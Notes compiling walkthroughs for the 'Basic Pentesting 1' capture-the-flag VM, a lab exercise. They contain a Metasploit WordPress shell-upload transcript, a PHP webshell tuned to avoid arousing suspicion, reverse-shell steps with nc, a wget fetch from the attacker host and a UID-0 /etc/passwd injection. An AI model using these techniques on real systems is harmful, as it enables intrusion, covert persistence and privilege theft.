Walkthru:
1. https://medium.com/@evire/basic-pentesting-1-7251fb3e3f9e [w/ Metasploit, using WordPress]
2. https://prasannakumar.in/infosec/vulnhub-basic-pentesting-1-writeup/ [w/ Metasploit, using FTP]
3. https://www.ceos3c.com/hacking/basic-pentesting-1-walkthrough/ [by uploading php-reverse-shell through WordPress]
4. http://k3ramas.blogspot.com/2018/02/basic-pentesting-1-walkthrough.html [access the WordPress config file to get the DB password and access the DB]
6. http://www.hackingarticles.in/hack-the-basic-penetration-vm-boot2root-challenge/ [use msfvenom to create a PHP shell to be uploaded through WordPress]
7. https://d7x.promiselabs.net/2018/01/30/ctf-basic-pentesting-a-guide-for-beginners/ [adding a command-execution line using PHP]
Notes:
- Ports: 21 ProFTPD 1.3.3c; 22 OpenSSH 7.2p2 Ubuntu 4ubuntu2.4; 80 Apache httpd 2.4.18
- Ran nikto and found the WordPress folder (/secret/)
- Need to add an entry in /etc/hosts to make the WordPress blog render correctly.
NOTE: When navigating to the folder, the web page looks deformed. The VM creator configured WordPress so that its links and redirects use the hostname vtcsec (e.g. http://vtcsec/secret/) instead of just appending /secret/ to the IP, so the browser cannot fetch the stylesheets and scripts. To fix this, add a line to /etc/hosts on the attacking machine that maps the IP of the vulnerable machine found earlier to the name vtcsec.
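The /etc/hosts fix, as an added example that is not a command from the notes or the writeups: the functions below map the target's IP to the hostname the VM's links point at without adding a second entry if one already exists, and the hosts file path is a parameter so they can be run against a scratch copy. The address 10.10.10.2 is the target used in the msfconsole transcript in these notes; substitute the real one.

```sh
#!/bin/sh
# Added example, not from the notes or the writeups: idempotently add a
# "ip  hostname" line to a hosts file. The path is a parameter (default
# /etc/hosts) so it can be exercised on a scratch file; editing the real
# /etc/hosts needs root. 10.10.10.2 / vtcsec are the values from these notes.

# True if a non-comment line of hosts file $1 names host $2
# (first field is the address, later fields are names/aliases).
has_hosts_entry() {
    awk -v n="$2" '
        /^[ \t]*#/ { next }
        { for (i = 2; i <= NF; i++) if ($i == n) found = 1 }
        END { exit !found }
    ' "$1"
}

# Print the address the hosts file gives for a name (first match wins,
# which is also how the resolver reads the file).
resolve_hosts() {
    awk -v n="$1" '
        /^[ \t]*#/ { next }
        { for (i = 2; i <= NF; i++) if ($i == n) { print $1; exit } }
    ' "${2:-/etc/hosts}"
}

# Append "ip<TAB>name" to $3 (default /etc/hosts) unless the name is already
# mapped; a second mapping would silently shadow or be shadowed by the first.
add_hosts_entry() {
    ip="$1"; name="$2"; hosts="${3:-/etc/hosts}"
    if has_hosts_entry "$hosts" "$name"; then
        echo "$name already maps to $(resolve_hosts "$name" "$hosts") in $hosts" >&2
        return 0
    fi
    printf '%s\t%s\n' "$ip" "$name" >> "$hosts"
}

# Usage on the attacking box (as root):  add_hosts_entry 10.10.10.2 vtcsec
```

Running it twice leaves one entry; a commented-out line naming vtcsec is ignored, which matters because a stale commented mapping is a common reason the "fix" appears not to take.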
- Able to log in to the blog with the default password (admin/admin).
- We are going to upload a PHP reverse shell through WordPress (a webshell). To avoid breaking the site (and, in theory, avoid instant detection), edit a page in a theme that is not in use. Where is that file located? Dirb gives a hint: it found the directory /secret/wp-content/themes/. Knowing the theme name and the page name, the rest of the URL is easy to guess: http://vtcsec/secret/wp-content/themes/twentyfifteen/404.php
- In WordPress, navigate to Appearance -> Editor and select the 404.php template of that theme.
- Paste the php-reverse-shell code into the template, then edit the two lines that set the IP and the port so the IP points to your attacking machine and the port is one you will listen on.
- Run nc -lvp 443 on Kali (matching the port you chose), then open the 404.php page in a browser to trigger the reverse shell.
===============
Walkthru 1: https://medium.com/@evire/basic-pentesting-1-7251fb3e3f9e [w/ Metasploit, using WordPress]
msf > use unix/webapp/wp_admin_shell_upload
msf exploit(unix/webapp/wp_admin_shell_upload) > set username admin
username => admin
msf exploit(unix/webapp/wp_admin_shell_upload) > set password admin
password => admin
msf exploit(unix/webapp/wp_admin_shell_upload) > set rhost 10.10.10.2
rhost => 10.10.10.2
msf exploit(unix/webapp/wp_admin_shell_upload) > set targeturi /secret
targeturi => /secret
msf exploit(unix/webapp/wp_admin_shell_upload) > exploit
If you've set the variables correctly, you should now be presented with a Meterpreter shell. It didn't work for me initially, but I used the hostname (vtcsec) in rhost instead of the IP and it worked. Now it's time to drop into a system command shell, spawn bash using python, and start checking for potential ways to achieve privilege escalation.
Checking for privilege escalation possibilities is easy using unix-privesc-check. To transfer the script to the machine, I downloaded it to /var/www/html on my pentest machine and started Apache. Then I transferred it with wget into the /tmp directory, as that is typically writable by any Linux user.
root@kali:~# service apache2 start
www-data@vtcsec:/tmp$ wget 10.10.10.1/unix-privesc-check
wget 10.10.10.1/unix-privesc-check
--2018-01-06 19:00:20-- http://10.10.10.1/unix-privesc-check
Connecting to 10.10.10.1:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 36801 (36K)
Saving to: 'unix-privesc-check'
unix-privesc-check 100%[===================>] 35.94K --.-KB/s in 0.002s
Marking it as executable, running it, and grepping for anything vulnerable, we find this:
WARNING: /etc/passwd is a critical config file. World write is set for /etc/passwd
Editing this file should let us either disable or change the root password; the x in the password field indicates that the hash lives in /etc/shadow, which we do not have access to. It turns out you can still set passwords directly in /etc/passwd, but make sure to generate a proper hash of the password. Removing the x should remove the need for a password, but it doesn't work in this case.
5. https://cowsayroot.com/walkthrough-basic-pentesting-1/ [WPScan, FTP Metasploit vulnerability, phpbash, which emulates a bash environment directly in your browser, which makes it very useful. Good one; includes creating a shell with msfvenom, uploading it to the victim and catching a reverse shell, but it didn't work for me. I could upload it to the victim using the webshell but was unable to run it and get a reverse shell]
-------------
7. https://d7x.promiselabs.net/2018/01/30/ctf-basic-pentesting-a-guide-for-beginners/ [adding a command-execution line using PHP]
To turn this vector into RCE, the following code can be injected into the index.php file (or any other file ending in .php, since it has to go through the PHP interpreter and output the result of the command instead of just displaying HTML):
<?php echo shell_exec($_GET['cmd']); ?>
[Screenshot: injecting PHP code into WordPress via the template editor]
By just opening the web page the output won't be visible, because of the way the WordPress theme's markup and styling are structured, but viewing the page source shows the command output:
[Screenshot: RCE webshell output, seen in the page source, via the WordPress template editor]
In order to make this neater, the above code can be changed to the following:
<?php
// Only act when the ?cmd= parameter is present; otherwise fall through to the normal template output.
if (isset($_GET['cmd'])) {
    echo shell_exec($_GET['cmd']);
    exit;
}
?>
This way only the output of the command passed via the "cmd" GET parameter is shown, and only when it is set; otherwise the page behaves normally, so ordinary visitors see nothing unusual and no suspicion is raised.
[Screenshot: the tidier RCE code injected via the WordPress template editor]
Bringing the RCE into a normal shell
After getting this far, the next step is to turn the webshell into a proper remote shell. This can be done in several ways: use msfvenom in Kali to build a payload, download and execute it on the target, or use tools already on the box, like nc. Here I'll show the most straightforward way, using nc. The first thing to check is that the target has the necessary tools:
There is a netcat binary on the target, which can be used to initiate a reverse shell back to us (this seems to be the BSD version of netcat, which lacks the -e option, so we have to use a backpipe). The command used above, along with other commonly used commands, can be found in my personal cheatsheet; look for "netcat backpipe".
[Screenshot: getting a shell using the BSD version of nc]
For more information on what a netcat backpipe is and how to initiate a netcat session without the -e option, see the SANS Penetration Testing article.
Phase 4: Privilege Escalation
Privilege escalation is occasionally a complicated process and reviewing it in detail is out of scope for this article. A must read is g0tmi1k's Basic Linux Privilege Escalation. In this case the /etc/passwd and /etc/shadow files have insecure permissions: as shown below, /etc/passwd is writable by anyone and /etc/shadow can be read by any user:
[Screenshot: insecure permissions on the /etc/passwd and /etc/shadow files]
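Both the unix-privesc-check notes above and this Phase 4 end at the same place: a world-writable /etc/passwd. As an added example (not code from either writeup), the block below shows the line an attacker appends and, on the other side, a check that flags a passwd file that has been abused that way. The hash string in the sample is a placeholder, not the crypt of any real password; a real one comes from `openssl passwd -6`. The behaviour the notes observed (a real hash in /etc/passwd works, blanking the x does not) matches how the login path treats the field: an "x" sends the lookup to /etc/shadow, a hash placed directly in /etc/passwd is used as-is, and an empty field is only honoured when PAM is configured with nullok.

```sh
#!/bin/sh
# Added example, not from either writeup: abuse and detection of a
# world-writable /etc/passwd. Sample data is constructed, not the VM's file.

# Attacker side: a complete passwd line for a new UID 0 / GID 0 account.
# $2 is a crypt(3) hash, e.g. from:  openssl passwd -6 'Passw0rd!'
mk_uid0_line() {
    printf '%s:%s:0:0:root:/root:/bin/bash\n' "$1" "$2"
}

# Defender side: read passwd-format text on stdin and print one finding per
# line for (a) UID 0 accounts other than root, (b) a hash stored in the
# password field instead of "x" (shadow) or a lock marker, (c) an empty field.
audit_passwd() {
    awk -F: '
        NF != 7                     { print "malformed line: " $0; next }
        $3 == 0 && $1 != "root"     { print "extra uid 0 account: " $1 }
        $2 != "x" && $2 != "*" && $2 != "!" && $2 != "" \
                                    { print "hash stored in passwd for: " $1 }
        $2 == ""                    { print "empty password field for: " $1 }
    '
}

# True if an octal mode (as printed by stat -c %a) has the world-write bit.
is_world_writable() {
    [ $(( 0$1 & 2 )) -ne 0 ]
}

# Constructed sample: two normal entries plus the injected line.
# The hash is a placeholder string, not a real crypt of anything.
sample_passwd() {
    printf 'root:x:0:0:root:/root:/bin/bash\n'
    printf 'www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n'
    mk_uid0_line hax '$6$saltsalt$placeholderhash'
}

# Usage on a live box:  audit_passwd < /etc/passwd ; is_world_writable "$(stat -c %a /etc/passwd)" && echo 'passwd is world-writable'
sample_passwd | audit_passwd
```

The audit reports the injected account twice (extra UID 0, hash in passwd), which is exactly the pair of symptoms this privesc leaves behind; a mode of 646 or 666 on the file is the precondition that made it possible.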